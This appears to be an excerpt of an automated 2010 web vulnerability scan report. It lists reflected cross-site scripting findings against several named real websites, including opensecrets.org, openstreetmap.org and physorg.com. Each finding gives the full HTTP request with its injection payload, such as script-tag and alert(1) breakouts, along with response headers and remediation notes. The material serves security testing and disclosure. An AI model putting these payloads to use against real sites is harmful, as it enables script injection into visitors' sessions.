HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:20 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a066"><a>6e1291e293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_room8a066"><a>6e1291e293b/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:18 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a74a"><a>886f2be4379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_room7a74a"><a>886f2be4379/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:19 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b45d"><a>58a95621c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_room2b45d"><a>58a95621c51/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:20 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63aa8"><a>d20e97deba5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_room63aa8"><a>d20e97deba5/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:29 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 229d9"><a>4dc96b2a07e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tasting_room229d9"><a>4dc96b2a07e/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:22 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13224
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><a>7fd5a5d0d72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twitterd9914"><a>7fd5a5d0d72/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:45:18 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb286"><a>ad9894bb919 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twittereb286"><a>ad9894bb919/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89ac"><a>3fe204e99a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twitterf89ac"><a>3fe204e99a2/content/css/ninkasi.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe021"><a>ac6878c8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twitterfe021"><a>ac6878c8598/content/css/print.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b875"><a>10326ad19f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twitter5b875"><a>10326ad19f9/content/js/basic.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23d0"><a>4971b5e26ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twitterf23d0"><a>4971b5e26ce/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb490"><a>66876d9e15c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /twitterfb490"><a>66876d9e15c/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:54:33 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93c4d"><script>alert(1)</script>a004d33db4e was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politicians/contrib.php?cycle=Career&cid=N0000488793c4d"><script>alert(1)</script>a004d33db4e&type=C HTTP/1.1 Host: www.opensecrets.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:44:53 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Type: text/html X-Cache: MISS from www.opensecrets.org Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The value of the cycle request parameter is copied into the HTML document as plain text between tags. The payload 9d455<script>alert(1)</script>ddfee2d13cf was submitted in the cycle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politicians/contrib.php?cycle=Career9d455<script>alert(1)</script>ddfee2d13cf&cid=N00004887&type=C HTTP/1.1 Host: www.opensecrets.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:44:50 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Type: text/html X-Cache: MISS from www.opensecrets.org Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The value of the cycle request parameter is copied into the HTML document as text between TITLE tags. The payload c2ad9</title><script>alert(1)</script>5dcde8f9c6d was submitted in the cycle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politicians/contrib.php?cycle=Careerc2ad9</title><script>alert(1)</script>5dcde8f9c6d&cid=N00004887&type=C HTTP/1.1 Host: www.opensecrets.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:44:51 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Type: text/html X-Cache: MISS from www.opensecrets.org Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The value of the cycle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1feb"><script>alert(1)</script>f0957ca7398 was submitted in the cycle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politicians/contrib.php?cycle=Careera1feb"><script>alert(1)</script>f0957ca7398&cid=N00004887&type=C HTTP/1.1 Host: www.opensecrets.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:44:49 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Type: text/html X-Cache: MISS from www.opensecrets.org Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a421b"><script>alert(1)</script>8d871a67f2e was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /politicians/contrib.php?cycle=Career&cid=N00004887&type=Ca421b"><script>alert(1)</script>8d871a67f2e HTTP/1.1 Host: www.opensecrets.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sun, 21 Nov 2010 21:44:54 GMT Server: Apache/2.0.63 X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Content-Type: text/html X-Cache: MISS from www.opensecrets.org Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
The value of the mlat request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c9f04%3balert(1)//ab6add74dfc was submitted in the mlat parameter. This input was echoed as c9f04;alert(1)//ab6add74dfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?mlat=37.762352c9f04%3balert(1)//ab6add74dfc&mlon=-122.419372&zoom=16 HTTP/1.1 Host: www.openstreetmap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the mlon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a2b6c%3balert(1)//496a80fd0b8 was submitted in the mlon parameter. This input was echoed as a2b6c;alert(1)//496a80fd0b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?mlat=37.762352&mlon=-122.419372a2b6c%3balert(1)//496a80fd0b8&zoom=16 HTTP/1.1 Host: www.openstreetmap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 20e64%3balert(1)//7a792e8d481 was submitted in the zoom parameter. This input was echoed as 20e64;alert(1)//7a792e8d481 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?mlat=37.762352&mlon=-122.419372&zoom=1620e64%3balert(1)//7a792e8d481 HTTP/1.1 Host: www.openstreetmap.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.386. http://www.partizan.com/partizan/musicvideos/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.partizan.com
Path:
/partizan/musicvideos/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82da3"><a>9c21b1ec5a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /partizan/musicvideos/?82da3"><a>9c21b1ec5a4=1 HTTP/1.1 Host: www.partizan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:46:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=4trmr1ed1i9i47ca7idls32ai5; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 10384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ...[SNIP]... <a href="/partizan/musicvideos/?82da3"><a>9c21b1ec5a4=1/biography" class="txtlink"> ...[SNIP]...
The value of the saam_farahmand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa123"><a>d9ce746badf was submitted in the saam_farahmand parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /partizan/musicvideos/?saam_farahmandaa123"><a>d9ce746badf HTTP/1.1 Host: www.partizan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:46:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=ljfjpe7s746q4aq0lp29rsll96; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 10396
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en ...[SNIP]... <a href="/partizan/musicvideos/?saam_farahmandaa123"><a>d9ce746badf/biography" class="txtlink"> ...[SNIP]...
1.388. http://www.physorg.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.physorg.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 81078--><script>alert(1)</script>2aa8be689af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?81078--><script>alert(1)</script>2aa8be689af=1 HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 21:42:17 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 860ed--><script>alert(1)</script>150357d3616 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /860ed--><script>alert(1)</script>150357d3616/ HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 21:42:19 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f23bb"><script>alert(1)</script>02b8f422e53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /f23bb"><script>alert(1)</script>02b8f422e53/ HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 21:42:16 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f459e"-alert(1)-"f28d0b6f659 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /f459e"-alert(1)-"f28d0b6f659/ HTTP/1.1 Host: www.physorg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 21 Nov 2010 21:42:17 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.392. http://www.plosone.org/article/info:doi/10.1371/journal.pone.0015502 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.plosone.org
Path:
/article/info:doi/10.1371/journal.pone.0015502
Issue detail
